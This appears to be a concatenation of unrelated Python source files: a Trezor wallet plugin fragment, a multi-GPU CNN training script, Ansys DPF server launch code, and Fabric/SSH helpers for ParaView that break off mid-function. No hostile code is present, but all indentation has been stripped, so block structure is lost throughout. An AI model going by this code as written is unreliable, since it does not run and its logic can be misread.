def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_ganja_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_ganja_tx_to_txtype(tx)
|
train_multi.py
|
import os
import sys
import time
import numpy
import argparse
import math
import random
import socket
import pickle
import time
import multiprocessing as mp
import threading
import denet.common as common
import denet.common.logging as logging
import denet.dataset as dataset
import denet.multi.shared as shared
from denet.multi.worker import WorkerProcess
from denet.multi.update_server import UpdateServer
from denet.multi.update_client import UpdateClient
from denet.dataset import DatasetExportThread
#updates model with training data
def run_train_epoch(args, update_client, workers, model, train_data, learn_rate):
import model_cnn
logging.info("Perform train...")
batch_size_factor = args.batch_size_factor
output_prefix = args.output_prefix
model_dims = args.model_dims
model_save_dt = args.model_save_dt*60
#update learning rates:
for worker in workers:
with worker.learn_rate.get_lock():
worker.learn_rate.value = learn_rate
#randomly shuffle data before each epoch, set seed to ensure each node has same data order
random.seed(args.seed + update_client.epoch)
train_data.shuffle()
#perform initial sync so that all nodes have the same model
model_update = shared.ModelUpdate(model_dims)
model_update.import_updates(model)
# update_client.sync(model_update, workers, initial=True)
#get subset next
subset_next = update_client.get_subset_next()
#start export of data
batch_size = len(workers) * model.batch_size * batch_size_factor
logging.info("SGD batch size is %ix%ix%i = %i"%(batch_size_factor, len(workers), model.batch_size, batch_size))
export_thread = DatasetExportThread(model, train_data, subset_next, batch_size, True)
#start processing
total_cost=0
total_it=0
subset_current = subset_next
epoch_current = update_client.epoch
for worker in workers:
worker.set_epoch(epoch_current)
timer = common.Timer()
timer_save = common.Timer()
while subset_next >= 0:
#wait until export is ready
timer.reset()
export_thread.wait()
data_x, data_y, data_size = export_thread.get_export()
subset_current = subset_next
del export_thread
if timer.current() > 1:
logging.warning("Warning: needed an additional %.1f seconds for dataset export"%timer.current())
#print training classes for checking random seed etc
logging.debug("Sample Metas: ", data_y[0:min(3, len(data_y))])
#start exporting next subset
subset_next = update_client.get_subset_next()
if subset_next >= 0:
export_thread = DatasetExportThread(model, train_data, subset_next, batch_size, True)
# #store initial model before changes
# model_update_delta = model_update.copy()
logging.info("Evaluating training function")
timer.reset()
batch_num = data_x.shape[0] // model.batch_size
it_num = batch_num // (len(workers)*batch_size_factor)
index=0
subset_cost = 0
while(index < batch_num):
total_ts = time.time()
def train_worker_thread(worker, indexs):
worker.wait()
worker.model_write(model_update)
worker.train_begin()
for i in indexs:
dx = data_x[i*model.batch_size : (i + 1)*model.batch_size]
dy = data_y[i*model.batch_size : (i + 1)*model.batch_size]
worker.train_step(dx, dy)
worker.wait()
worker.train_end()
worker.model_read()
worker.wait()
threads=[]
for worker in workers:
worker_indexs=[]
for _ in range(batch_size_factor):
if index < batch_num:
worker_indexs.append(index)
index += 1
t = threading.Thread(target=train_worker_thread, args=(worker, worker_indexs))
t.start()
threads.append((t, time.time()))
proc_ts = []
for t, start_ts in threads:
t.join()
proc_ts.append(int(1000*(time.time() - start_ts)))
#average models between GPUS and print batch info
combine_ts = time.time()
batch_cost = 0
model_update.set_mean_init()
for worker in workers:
model_update.set_mean_update(worker.model_update)
with worker.cost.get_lock():
batch_cost += worker.cost.value
model_update.set_mean_finish()
batch_cost /= len(workers)
subset_cost += batch_cost
it_index = index // (len(workers)*batch_size_factor)
combine_ts = int(1000*(time.time() - combine_ts))
logging.verbose("Processing times (ms):", proc_ts, ", Combine time: %i ms"%combine_ts)
logging.info("Subset %i/%i, Batch It %i/%i"%(subset_current+1, train_data.subset_num, it_index, it_num), "- Cost:", batch_cost, "Time: %i ms"%(1000*(time.time() - total_ts)))
logging.info("Training subset %i took %0.1f sec, mean cost:"%(subset_current+1, timer.current()), subset_cost / it_num)
total_it += it_num
total_cost += subset_cost
#update with server (if one exists)
model_update.export_updates(model)
# model_update_delta.set_delta(model_update)
# update_client.update(model_update_delta, model_update, workers)
#save intermediate models
if timer_save.current() > model_save_dt and model_save_dt > 0:
model_cnn.save_to_file(model, output_prefix + "_epoch%03i_subset%03i.mdl.gz"%(epoch_current, subset_current+1))
timer_save.reset()
#perform final sync so that all nodes have the same model
update_client.sync(model_update, workers)
#save final models
model_cnn.save_to_file(model, output_prefix + "_epoch%03i_final.mdl.gz"%(epoch_current))
return (total_cost / total_it)
#compute per class error rates
def compute_error(workers, model, test_data):
logging.info("Perform inference...")
class_errors=[0]*model.class_num
class_samples=[0]*model.class_num
#export first data
export_thread = DatasetExportThread(model, test_data, 0, len(workers)*model.batch_size, False)
for subset in range(test_data.subset_num):
export_thread.wait()
data_x, data_y, data_size = export_thread.get_export()
truth_labels = export_thread.get_labels()
del export_thread
#start exporting next subset
if (subset+1) < test_data.subset_num:
logging.info("Starting next subset export")
export_thread = DatasetExportThread(model, test_data, subset + 1, len(workers)*model.batch_size, False)
logging.info("Evaluating predict function (%i samples)"%data_size)
predict_y = numpy.zeros(shape=(data_x.shape[0], model.get_probability_shape()[1]), dtype=numpy.float32)
nbatch = data_x.shape[0] // model.batch_size
index=0
while(index < nbatch):
#use group of workers to process multi gpu batch
active_workers=[]
for worker in workers:
if index < nbatch:
dx = data_x[index * model.batch_size : (index + 1) * model.batch_size];
worker.predict(dx)
active_workers.append(worker)
index += 1
#as workers finish combine resulting models
done=[False]*len(active_workers)
while(False in done):
for i, worker in enumerate(active_workers):
if done[i] == False and worker.get_active() == 0:
done[i] = True
worker_index = index - len(active_workers) + i
logging.verbose("Adding predictions %i/%i"%(worker_index, nbatch))
with worker.data_y.lock:
predict_y[worker_index * model.batch_size : (worker_index + 1) * model.batch_size, ...] = worker.data_y.get_array()[...]
time.sleep(0.0001)
predict_y = predict_y[0:data_size, ...]
predict_labels = numpy.argmax(predict_y, axis=1)
#print("sizes:", truth_labels.shape, data_size)
for i in range(data_size):
class_samples[truth_labels[i]] += 1
if predict_labels[i] != truth_labels[i]:
class_errors[truth_labels[i]] += 1
#compute errors
error=100.0*sum(class_errors) / sum(class_samples)
cls_errors=[]
for i in range(model.class_num):
x = 100.0*class_errors[i] / class_samples[i] if class_samples[i] > 0 else 100.0
cls_errors.append((i, x, class_samples[i]))
return (error, cls_errors)
def save_results(fname, error, class_errors):
with open(fname, "w") as f:
logging.info("Overall Error=%.2f%%"%(error), file=f)
for d in class_errors:
logging.info("Class %i=%.2f%% (%i samples)"%(d[0],d[1],d[2]*d[1]/100), file=f)
def load_restart_args(args_fname, args):
if not os.path.isfile(args_fname):
raise Exception("Cannot find arguments file:" + args_fname)
logging.info("Loading arguments from:", args_fname)
with open(args_fname, "rb") as f:
args = pickle.load(f)
#search for models
model_fnames = common.find_files(os.path.dirname(args.output_prefix), "*_epoch*.mdl.gz")
if len(model_fnames) == 0:
raise Exception("Could not find any intermediate models to continue training from!")
v = os.path.basename(model_fnames[-1])
v = v[:v.find(".")].split("_")
if v[-1] == "final":
args.epoch_start = int(v[-2][5:]) + 1
args.subset_start = 0
else:
args.epoch_start = int(v[-2][5:])
args.subset_start = int(v[-1][6:]) + 1
args.model = model_fnames[-1]
logging.info("Continuing training with model:", args.model, "epoch:", args.epoch_start, "subset:", args.subset_start)
return args
def main():
#load arguments:
parser = argparse.ArgumentParser(description='Train a convolutional network using labelled data')
logging.add_arguments(parser)
parser.add_argument("--use-acc-mode", default=False, action="store_true", help="Use model accumulation over multiple batches (uses more VRAM)")
parser.add_argument("--cost-factors", default=[], nargs="+", help="Multiplicative factors for model costs")
parser.add_argument("--export-model-dims", default=False, action="store_true", help="Ignore, don't use this option!")
parser.add_argument("--model-dims", default="./model-dims.json", type=str, help="export file for shared model dimensions")
parser.add_argument("--model-save-dt", default=30, type=int, help="Minimum time (min) between saving an intermediate model. Use 0 to disable.")
parser.add_argument("--model", required=False, default=None, help="Model to continue training.")
parser.add_argument("--gpus", nargs="+", default=["gpu0"], help="list of gpus to train over")
parser.add_argument("--update-server", metavar="<addr> [port] [offset] [delta]", nargs="+", default=None,
help="model update server for synchronizing multiple networked machines. Set <addr> to 'mpi' for MPI networking.")
parser.add_argument("--subset-max", type=int, default=10000000, help="Specify maximum number of subsets to be used in each training epoch")
parser.add_argument("--train", default=None, help="The folder with training / validation data")
parser.add_argument("--test", default=None, help="The folder with testing data (optional)")
parser.add_argument("--test-mode", default="default", help="Testing Mode")
parser.add_argument("--test-epochs", type=int, default=1, help="Epochs between each test evaluation")
parser.add_argument("--thread-num", type=int, default=1, help="Number of threads to use for supported opeartions (e.g. loading/distorting datasets)")
parser.add_argument("--extension", default="ppm", help="Image file extension")
parser.add_argument("--activation", default="relu", help="Activation function used in convolution / hidden layers (tanh, relu, leaky-relu)")
parser.add_argument("--border-mode", default="half", help="Border mode for convolutional layers (full, valid)")
parser.add_argument("--output-prefix", default="./model", help="Output prefix for model files")
parser.add_argument("--solver", type=str, default="nesterov", help="")
parser.add_argument("--weight-init", nargs="+", default=["he-backward"], help="Weight initialization scheme")
parser.add_argument("--initial-tune", type=float, default=0.0, help="Perform initial tuning with learning rate")
parser.add_argument("--learn-rate", type=float, default=0.1, help="Learning rate for weights and biases.")
parser.add_argument("--learn-momentum", type=float, default=[0.0,0.0], nargs="+", help="Learning momentum for weights and biases (0.0 - 1.0).")
parser.add_argument("--learn-anneal", type=float, default=1, help="Annealing factor per epoch for weight and bias learning rate")
parser.add_argument("--learn-anneal-epochs", nargs="+", type=int, default=[], help="Epochs to apply learning rate annealing (default every epoch)")
parser.add_argument("--learn-decay", type=float, default=0.0, help="L2 weight decay (not applied to biases). ")
parser.add_argument("--epochs", type=int, default=30, help="The number of training epochs")
parser.add_argument("--epoch-start", type=int, default=0, help="Epoch to start from")
parser.add_argument("--subset-start", type=int, default=0, help="Subset to start from")
parser.add_argument("--max-samples", type=int, default=None, help="Maximum samples to load from training set")
parser.add_argument("--batch-size", type=int, default=32, help="Size of each processing batch (per GPU)")
parser.add_argument("--batch-size-factor", type=int, default=1, help="Batch size multiplier, use when desired batch size won't fit in memory.")
parser.add_argument("--batch-data-size", type=int, default=1, help="Number of batches to upload to GPU for processing")
parser.add_argument("--seed", type=int, default=23455, help="Random Seed for weights")
parser.add_argument("--split-seed", type=int, default=0, help="Random Seed for splitting into validation / training")
parser.add_argument("--export-symbolic", default=None, help="Save datasets as symbolic links")
parser.add_argument("--distort-mode", default=[], nargs="+", help="Distortions to apply to training data (default, cifar10, disable)")
parser.add_argument("--augment-mirror", default=False, action="store_true", help="Augment training data with horizontally mirrored copies")
parser.add_argument("--skip-train", default=False, action="store_true", help="Skip training of model")
parser.add_argument("--skip-layer-updates", type=int, nargs="+", default=[], help="Skip training updates to specified layers")
parser.add_argument("--model-desc", default=["C100,7", "P2", "C150,4", "P2", "C250,4", "P2", "C300,1", "CR"], nargs="+", type=str, help="Network layer description" )
parser.add_argument("--theano-flags", type=str, default="lib.cnmem=1.0", help="Additional THEANO_FLAGS environment variables for worker threads")
parser.add_argument("--restart", default=False, action="store_true", help="Restart training of model")
args = parser.parse_args()
logging.init(args)
#continue training
args_fname = "./train.args"
if args.restart:
args = load_restart_args(args_fname, args)
else:
logging.info("Exporting arguments:", args_fname)
with open(args_fname, "wb") as f:
pickle.dump(args, f)
#start MPI update server if this is master node:
if not args.update_server is None and args.update_server[0] == "mpi":
from mpi4py import MPI
if MPI.COMM_WORLD.Get_rank() == 0:
momentum = float(args.update_server[1])
update_server = UpdateServer(args.model_dims, momentum=momentum, use_mpi=True, use_async=True)
sys.exit(update_server.start())
#set random seeds
random.seed(args.seed)
numpy.random.seed(args.seed)
#load training dataset
logging.info("Loading training data: " + str(args.train))
train_data = dataset.load(args.train, args.extension, is_training=True, thread_num=args.thread_num)
data_shape = train_data.get_data_shape()
class_num = train_data.get_class_num()
class_labels = train_data.class_labels
logging.info("Found %i samples across %i class Labels:\n"%(train_data.get_total_size(), class_num), class_labels)
#HACK to determine model parameter dimensions for shared models without initializing theano...
#Not need any more in theano-0.8.0
if not os.path.isfile(args.model_dims):
logging.info("Exporting model dims file to " + args.model_dims)
import model_cnn
model = model_cnn.initialize(args, data_shape, class_labels, class_num)
model.build_train_func(args.solver, skip_build=True)
shared.ModelUpdate.save_dims(args.model_dims, model)
logging.info("Done")
exit(0)
#construct worker processes (must be done before model due to Theano init! No longer true in theano 0.8.0):
logging.info("Initializing worker procs for", args.gpus)
workers = [WorkerProcess(gpu, args, data_shape, class_labels) for gpu in args.gpus]
#initialize model (and Theano)
import model_cnn
model = model_cnn.initialize(args, data_shape, class_labels, class_num)
model.build_train_func(args.solver, skip_build=True)
#mirror training data
if args.augment_mirror:
train_data.augment_mirror();
#load test dataset
if args.test:
logging.info("Loading test: " + str(args.test))
test_data = dataset.load(args.test, args.extension, is_training=False, class_labels=class_labels, thread_num=args.thread_num)
logging.info("Testing: " + str(test_data.get_total_size()) + " samples")
assert(test_data.get_total_size() != 0)
#connect with update server
if not args.update_server is None:
addr = args.update_server[0]
use_mpi = bool(addr == "mpi")
use_async = bool(len(args.update_server) == 2)
port = 0 if use_mpi else int(args.update_server[1])
offset = 0 if use_async else int(args.update_server[2])
delta = 0 if use_async else int(args.update_server[3])
logging.info("Connecting to update server (async=%i, mpi=%i): "%(use_async, use_mpi), addr, port)
sock = 0 if use_mpi else socket.create_connection((addr, port))
update_client = UpdateClient(args.epoch_start, args.subset_start, train_data.subset_num, sock, use_async, use_mpi, offset, delta)
else:
update_client = UpdateClient(args.epoch_start, args.subset_start, train_data.subset_num)
#perform training and save models
if args.initial_tune > 0:
logging.info("----- Initial Fine Tune -----")
logging.info("Running initial tune with learning rate:", args.initial_tune)
run_train_epoch(args, update_client, workers, model, train_data, args.initial_tune)
#anneal learning rate
learn_rate = args.learn_rate
for epoch in range(0, args.epoch_start):
if len(args.learn_anneal_epochs) == 0 or (epoch+1) in args.learn_anneal_epochs:
logging.verbose("Annealing learning rate")
learn_rate *= args.learn_anneal
#Run training
best_test_error=100.0;
for epoch in range(args.epoch_start, args.epochs):
logging.info("----- Training Epoch: " + str(epoch) + " -----")
#perform training and save models
if not args.skip_train:
logging.info("Training with learning rates " + str(learn_rate) + " and momentum " + str(args.learn_momentum))
timer = common.Timer()
cost = run_train_epoch(args, update_client, workers, model, train_data, learn_rate)
logging.info("Training - mean cost:", cost, ", took %.0f sec"%timer.current())
#anneal learning rate
if len(args.learn_anneal_epochs) == 0 or (epoch+1) in args.learn_anneal_epochs:
logging.verbose("Annealing learning rate")
learn_rate *= args.learn_anneal
#perform testing
test_error=0
if args.test and ((epoch%args.test_epochs) == 0 or epoch == (args.epochs-1)):
ts = time.time()
test_error, test_class_errors = compute_error(workers, model, test_data)
logging.info("Epoch %i Test Error: %.2f%%, Took %.0f sec"%(epoch, test_error, time.time()-ts))
save_results(args.output_prefix + "_epoch%03i.test"%epoch, test_error, test_class_errors)
logging.info("Finished Training")
if __name__ == '__main__':
#make additional processes spawn a new python interpretter
import multiprocessing as mp
mp.set_start_method('spawn')
sys.setrecursionlimit(10000)
sys.exit(main())
|
server.py
|
"""
Server
======
Contains the directives necessary to start the DPF server.
"""
from threading import Thread
import io
import platform
import logging
import time
import os
import socket
import subprocess
import grpc
import psutil
import weakref
import atexit
import copy
from ansys import dpf
from ansys.dpf.core.misc import find_ansys, is_ubuntu
from ansys.dpf.core import errors
from ansys.dpf.core._version import __ansys_version__
MAX_PORT = 65535
LOG = logging.getLogger(__name__)
LOG.setLevel("DEBUG")
# default DPF server port
DPF_DEFAULT_PORT = int(os.environ.get("DPF_PORT", 50054))
LOCALHOST = os.environ.get("DPF_IP", "127.0.0.1")
def shutdown_global_server():
try:
if dpf.core.SERVER != None:
del dpf.core.SERVER
except:
pass
atexit.register(shutdown_global_server)
def has_local_server():
"""Check if a local DPF gRPC server has been created.
Returns
-------
bool
``True`` when a local DPF gRPC server has been created.
"""
return dpf.core.SERVER is not None
def _global_server():
"""Retrieve the global server if it exists.
If the global server has not been specified, check if the user
has specified the "DPF_START_SERVER" environment variable. If
``True``, start the server locally. If ``False``, connect to the
existing server.
"""
if dpf.core.SERVER is None:
if os.environ.get("DPF_START_SERVER", "").lower() == "false":
ip = os.environ.get("DPF_IP", LOCALHOST)
port = int(os.environ.get("DPF_PORT", DPF_DEFAULT_PORT))
connect_to_server(ip, port)
else:
start_local_server()
return dpf.core.SERVER
def port_in_use(port, host=LOCALHOST):
"""Check if a port is in use at the given host.
The port must actually "bind" the address. Just checking to see if a
socket can be created is insufficient because it's possible to run into
permission errors like: ``An attempt was made to access a socket in a way
forbidden by its access permissions.``
Returns
-------
bool
``True`` when the port is in use, ``False`` when free.
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
try:
sock.bind((host, port))
return False
except:
return True
def check_valid_ip(ip):
"""Check if a valid IP address is entered.
This method raises an error when an invalid IP address is entered.
"""
try:
socket.inet_aton(ip)
except OSError:
raise ValueError(f'Invalid IP address "{ip}"')
def shutdown_all_session_servers():
"""Shut down all active servers created by this module."""
from ansys.dpf.core import _server_instances
copy_instances = copy.deepcopy(_server_instances)
for instance in copy_instances:
try:
instance().shutdown()
except Exception as e:
print(e.args)
pass
def start_local_server(
ip=LOCALHOST,
port=DPF_DEFAULT_PORT,
ansys_path=None,
as_global=True,
load_operators=True,
):
"""Start a new local DPF server at a given port and IP address.
This method requires Windows and ANSYS 2021 R1 or later. If ``as_global=True``, which is
the default) the server is stored globally, replacing the one stored previously.
Otherwise, a user must keep a handle on their server.
Parameters
----------
ip : str, optional
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
ansys_path : str, optional
Root path for the Ansys installation directory. For example, ``"/ansys_inc/v212/"``.
The default is the latest Ansys installation.
as_global : bool, optional
Global variable that stores the IP address and port for the DPF
module. All DPF objects created in this Python session will
use this IP and port. The default is ``True``.
load_operators : bool, optional
Whether to automatically load the math operators. The default is ``True``.
Returns
-------
server : server.DpfServer
"""
if ansys_path is None:
ansys_path = os.environ.get("AWP_ROOT" + __ansys_version__, find_ansys())
if ansys_path is None:
raise ValueError(
"Unable to automatically locate the Ansys path. "
"Manually enter one when starting the server or set it "
'as the environment variable "ANSYS_PATH"'
)
# verify path exists
if not os.path.isdir(ansys_path):
raise NotADirectoryError(f'Invalid Ansys path "{ansys_path}"')
# parse the version to an int and check for supported
try:
ver = int(ansys_path[-3:])
if ver < 211:
raise errors.InvalidANSYSVersionError(f"Ansys v{ver} does not support DPF")
if ver == 211 and is_ubuntu():
raise OSError("DPF on v211 does not support Ubuntu")
except ValueError:
pass
# avoid using any ports in use from existing servers
used_ports = []
if dpf.core._server_instances:
for srv in dpf.core._server_instances:
if srv():
used_ports.append(srv().port)
while port in used_ports:
port += 1
# verify port is free
while port_in_use(port):
port += 1
server = None
n_attempts = 10
for _ in range(n_attempts):
try:
server = DpfServer(
ansys_path, ip, port, as_global=as_global, load_operators=load_operators
)
break
except errors.InvalidPortError: # allow socket in use errors
port += 1
if server is None:
raise OSError(
f"Unable to launch the server after {n_attempts} attempts. "
"Check the following path:\n{ansys_path}\n\n"
"or attempt to use a different port"
)
dpf.core._server_instances.append(weakref.ref(server))
return server
def connect_to_server(ip=LOCALHOST, port=DPF_DEFAULT_PORT, as_global=True, timeout=5):
"""Connect to an existing DPF server.
This method sets the global default channel that is then used for the
duration of the DPF sesssion.
Parameters
----------
ip : str
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
as_global : bool, optional
Global variable that stores the IP address and port for the DPF
module. All DPF objects created in this Python session will
use this IP and port. The default is ``True``.
timeout : float, optional
Maximum number of seconds for the initalization attempt.
The default is ``10``. Once the specified number of seconds
passes, the connection fails.
Examples
--------
>>> from ansys.dpf import core as dpf
Create a server.
>>> #server = dpf.start_local_server(ip = '127.0.0.1')
>>> #port = server.port
Connect to a remote server at a non-default port.
>>> #specified_server = dpf.connect_to_server('127.0.0.1', port, as_global=False)
Connect to the localhost at the default port.
>>> #unspecified_server = dpf.connect_to_server(as_global=False)
"""
server = DpfServer(ip=ip, port=port, as_global=as_global, launch_server=False)
dpf.core._server_instances.append(weakref.ref(server))
return server
class DpfServer:
"""Provides an instance of the DPF server.
Parameters
-----------
server_bin : str
Path for the DPF executable.
ip : str
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
timeout : float, optional
Maximum number of seconds for the initalization attempt.
The default is ``10``. Once the specified number of seconds
passes, the connection fails.
as_global : bool, optional
Global variable that stores the IP address and port for the DPF
module. All DPF objects created in this Python session will
use this IP and port. The default is ``True``.
load_operators : bool, optional
Whether to automatically load the math operators. The default
is ``True``.
launch_server : bool, optional
Whether to launch the server on Windows.
"""
def __init__(
self,
ansys_path="",
ip=LOCALHOST,
port=DPF_DEFAULT_PORT,
timeout=10,
as_global=True,
load_operators=True,
launch_server=True,
):
"""Start the DPF server."""
# check valid ip and port
check_valid_ip(ip)
if not isinstance(port, int):
raise ValueError("Port must be an integer")
if os.name == "posix" and "ubuntu" in platform.platform().lower():
raise OSError("DPF does not support Ubuntu")
elif launch_server:
launch_dpf(ansys_path, ip, port)
self.channel = grpc.insecure_channel("%s:%d" % (ip, port))
if launch_server is False:
state = grpc.channel_ready_future(self.channel)
# verify connection has matured
tstart = time.time()
while ((time.time() - tstart) < timeout) and not state._matured:
time.sleep(0.01)
if not state._matured:
raise TimeoutError(
f"Failed to connect to {ip}:{port} in {timeout} seconds"
)
LOG.debug("Established connection to DPF gRPC")
# assign to global channel when requested
if as_global:
dpf.core.SERVER = self
# TODO: add to PIDs ...
# store port and ip for later reference
self.live = True
self.ansys_path = ansys_path
self._input_ip = ip
self._input_port = port
self._own_process = launch_server
@property
def _base_service(self):
if not hasattr(self, "__base_service"):
from ansys.dpf.core.core import BaseService
self.__base_service = BaseService(self, timeout=1)
return self.__base_service
@property
def info(self):
"""Server information.
Returns
-------
info : dictionary
Dictionary with server information, including ``"server_ip"``,
``"server_port"``, ``"server_process_id"``, and
``"server_version"`` keys.
"""
return self._base_service.server_info
@property
def ip(self):
"""IP address of the server.
Returns
-------
ip : str
"""
try:
return self._base_service.server_info["server_ip"]
except:
return ""
@property
def port(self):
"""Port of the server.
Returns
-------
port : int
"""
try:
return self._base_service.server_info["server_port"]
except:
return 0
@property
def version(self):
"""Version of the server.
Returns
-------
version : str
"""
return self._base_service.server_info["server_version"]
def __str__(self):
return f"DPF Server: {self.info}"
def shutdown(self):
if self._own_process and self.live and self._base_service:
self._base_service._prepare_shutdown()
p = psutil.Process(self._base_service.server_info["server_process_id"])
p.kill()
time.sleep(0.1)
self.live = False
try:
if id(dpf.core.SERVER) == id(self):
dpf.core.SERVER = None
except:
pass
try:
for i, server in enumerate(dpf.core._server_instances):
if server() == self:
dpf.core._server_instances.remove(server)
except:
pass
def __eq__(self, other_server):
"""Return true, if the ip and the port are equals"""
if isinstance(other_server, DpfServer):
return self.ip == other_server.ip and self.port == other_server.port
return False
def __ne__(self, other_server):
"""Return true, if the ip or the port are different"""
return not self.__eq__(other_server)
def __del__(self):
try:
self.shutdown()
except:
pass
def check_version(self, required_version, msg=None):
"""Check if the server version matches with a required version.
Parameters
----------
required_version : str
Required version to compare with the server version.
msg : str, optional
Message for the raised exception if version requirements do not match.
Raises
------
dpf_errors : errors
errors.DpfVersionNotSupported is raised if failure.
Returns
-------
bool
``True`` if the server version meets the requirement.
"""
from ansys.dpf.core.check_version import server_meet_version_and_raise
return server_meet_version_and_raise(required_version, self, msg)
def launch_dpf(ansys_path, ip=LOCALHOST, port=DPF_DEFAULT_PORT, timeout=10):
"""Launch Ansys DPF.
Parameters
----------
ansys_path : str, optional
Root path for the Ansys installation directory. For example, ``"/ansys_inc/v212/"``.
The default is the latest Ansys installation.
ip : str, optional
IP address of the remote or local instance to connect to. The
default is ``"LOCALHOST"``.
port : int
Port to connect to the remote instance on. The default is
``"DPF_DEFAULT_PORT"``, which is 50054.
timeout : float, optional
Maximum number of seconds for the initalization attempt.
The default is ``10``. Once the specified number of seconds
passes, the connection fails.
Returns
-------
process : subprocess.Popen
DPF Process.
"""
if os.name == "nt":
run_cmd = f"Ans.Dpf.Grpc.bat --address {ip} --port {port}"
path_in_install = "aisol/bin/winx64"
else:
run_cmd = ["./Ans.Dpf.Grpc.sh", f"--address {ip}", f"--port {port}"]
path_in_install = "aisol/bin/linx64"
# verify ansys path is valid
if os.path.isdir(f"{ansys_path}/{path_in_install}"):
dpf_run_dir = f"{ansys_path}/{path_in_install}"
else:
dpf_run_dir = f"{ansys_path}"
if not os.path.isdir(dpf_run_dir):
raise NotADirectoryError(
f'Invalid ansys path at "{ansys_path}". '
"Unable to locate the directory containing DPF at "
f'"{dpf_run_dir}"'
)
old_dir = os.getcwd()
os.chdir(dpf_run_dir)
process = subprocess.Popen(run_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
os.chdir(old_dir)
# check to see if the service started
lines = []
def read_stdout():
for line in io.TextIOWrapper(process.stdout, encoding="utf-8"):
LOG.debug(line)
lines.append(line)
errors = []
def read_stderr():
for line in io.TextIOWrapper(process.stderr, encoding="utf-8"):
LOG.error(line)
errors.append(line)
# must be in the background since the process reader is blocking
Thread(target=read_stdout, daemon=True).start()
Thread(target=read_stderr, daemon=True).start()
t_timeout = time.time() + timeout
started = False
while not started:
started = any("server started" in line for line in lines)
if time.time() > t_timeout:
raise TimeoutError(f"Server did not start in {timeout} seconds")
# verify there were no errors
time.sleep(1)
if errors:
try:
process.kill()
except PermissionError:
pass
errstr = "\n".join(errors)
if "Only one usage of each socket address" in errstr:
raise errors.InvalidPortError(f"Port {port} in use")
raise RuntimeError(errstr)
|
pvserver.py
|
from paraview.simple import *
from fabric.api import (env, run, cd, get, hide, settings,
remote_tunnel, show, shell_env)
from fabric.tasks import execute
from zutil import analysis
import logging
log = logging.getLogger("paramiko.transport")
sh = logging.StreamHandler()
sh.setLevel(logging.DEBUG)
log.addHandler(sh)
import sys
import multiprocessing as mp
from multiprocessing import Process, Value
process_id = None
use_multiprocess = True
# Uncomment for output logging
# logger = mp.get_logger()
# logger.addHandler(logging.StreamHandler(sys.stdout))
# logger.setLevel(mp.SUBDEBUG)
def pvserver(remote_dir, paraview_cmd, paraview_port, paraview_remote_port):
with show('debug'), remote_tunnel(int(paraview_remote_port), local_port=int(paraview_port)), cd(remote_dir):
# with cd(remote_dir):
if not use_multiprocess:
run('sleep 2;' + paraview_cmd + '</dev/null &>/dev/null&', pty=False)
else:
# # run('sleep 2;'+paraview_cmd+'&>/dev/null',pty=False)
run('sleep 2;' + paraview_cmd) # , pty=False)
# run(paraview_cmd+'</dev/null &>/dev/null',pty=False)
# run('screen -d -m "yes"')
# ssh asrc2 "(ls</dev/null &>/dev/null&) 2>&1; true" 2>/dev/null || echo
# SSH connection or remote command failed - either of them returned
# non-zero exit code $?
def pvcluster(remote_dir, paraview_home, paraview_args,
paraview_port, paraview_remote_port, job_dict):
with show('debug'), remote_tunnel(int(paraview_remote_port), local_port=int(paraview_port)):
with shell_env(PARAVIEW_HOME=paraview_home, PARAVIEW_ARGS=paraview_args):
run('echo $PARAVIEW_HOME')
run('echo $PARAVIEW_ARGS')
run('mkdir -p ' + remote_dir)
with cd(remote_dir):
cmd_line = 'mycluster --create pvserver.job --jobname=pvserver'
cmd_line += ' --jobqueue ' + job_dict['job_queue']
cmd_line += ' --ntasks ' + job_dict['job_ntasks']
cmd_line += ' --taskpernode ' + job_dict['job_ntaskpernode']
if 'vizstack' in paraview_args:
cmd_line += ' --script mycluster-viz-paraview.bsh'
else:
cmd_line += ' --script mycluster-paraview.bsh'
cmd_line += ' --project ' + job_dict['job_project']
run(cmd_line)
run('chmod u+rx pvserver.job')
run('mycluster --immediate --submit pvserver.job')
def port_test(rport, lport):
# Run a test
with hide('everything'), remote_tunnel(int(rport), local_port=int(lport)):
run('cd')
def run_uname(with_tunnel):
with hide('everything'):
run('uname -a')
def test_ssh(status, **kwargs):
_remote_host = analysis.data.data_host
if 'data_host' in kwargs:
_remote_host = kwargs['data_host']
try:
env.use_ssh_config = True
execute(run_uname, False, hosts=[_remote_host])
except:
status.value = 0
return False
return True
def test_ssh_mp(**kwargs):
